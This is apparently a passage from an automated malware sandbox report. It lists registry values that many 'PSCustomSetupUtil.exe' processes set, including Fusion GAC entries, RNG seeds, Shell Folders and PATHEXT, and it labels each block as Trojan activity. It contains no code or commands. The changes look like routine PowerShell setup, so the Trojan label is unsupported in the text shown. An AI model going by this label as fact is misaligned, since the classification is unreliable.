"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 37 BB C1 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE CE 84 8A 4B 4E 79 06 01 42 DA C1 8C 5D 68 45"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3908 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 19 B0 A2 BB EB BF E4 A2 79 5E 59 6F C7 3E 6C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "D0 21 40 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:1924 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 50 62 BF 48 1D 64 06 81 5A F9 42 E8 ED D5 D0"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "3C 19 FA C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2196 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 1B 63 31 B1 E9 45 92 EA 34 4B D7 FF 9D 1F 61"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3064 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 42 49 A1 AC F5 97 AF D8 6C 2A B6 B6 83 FB C7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 14 B1 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:2308 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 BB 4D 64 5E FF EE F0 D9 2F DD 88 AE 80 9C 44"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 A1 25 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1C 54 50 3A DC B2 53 F9 5F B5 A7 9F A6 BD 6B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "D2 ED 52 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3696 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 86 8A C2 BE DF E7 6D AE 37 33 16 73 BA 6A 75"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A 26 E3 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:3856 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 88 9F 29 F5 79 12 80 1B 61 63 9A 42 93 37 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C8 72 10 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 94 2B 0E C7 49 55 86 DA 21 BF FC 0C 8B D4 16"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 A7 4C C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:2244 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 98 28 4B ED 76 73 C8 4C 3F 27 FB 96 4B 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2112 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6E F0 B4 42 B2 00 1E 28 ED A9 9B A6 A9 43 A9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "FC FA DE C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:2240 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 D5 BF DE 2B D1 CD 25 FC 14 EA 7A 0B 27 DE 27"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6E 6A 70 C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3992 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 48 8A 6D DB 3C 3D D7 6F C2 0D E4 82 32 0E 1F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 BB 23 01 82 BB 18 A9 52 1E 01 FC 97 50 26 AD"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "38 40 04 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2344 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A A2 10 4F 26 AA 17 8C C0 05 44 A2 CB 8A 03 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "18 B1 76 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 48 CC FF 48 FC 2E 11 1A 63 31 45 63 D8 42 CD"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 0C 6B C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2552 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A6 0A EC 9E A9 21 A5 CA 48 76 F7 C5 41 F2 7C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 FD A3 CB AB F3 D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:1496 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 0E AF DF 7E E4 4F 40 EB 12 10 40 BD DB FF 77"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "42 BE 02 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:264 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 48 43 BB 4D 22 9F 00 44 91 BB 71 1C 2E E1 3D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "DA 07 C8 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:1868 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 53 0C 7F 00 97 51 F2 4E 8E ED 67 C5 49 74 A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F2 14 57 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:1284 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 6E 48 65 D3 1E CE 0A 46 9C 44 05 11 B7 0E 7D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
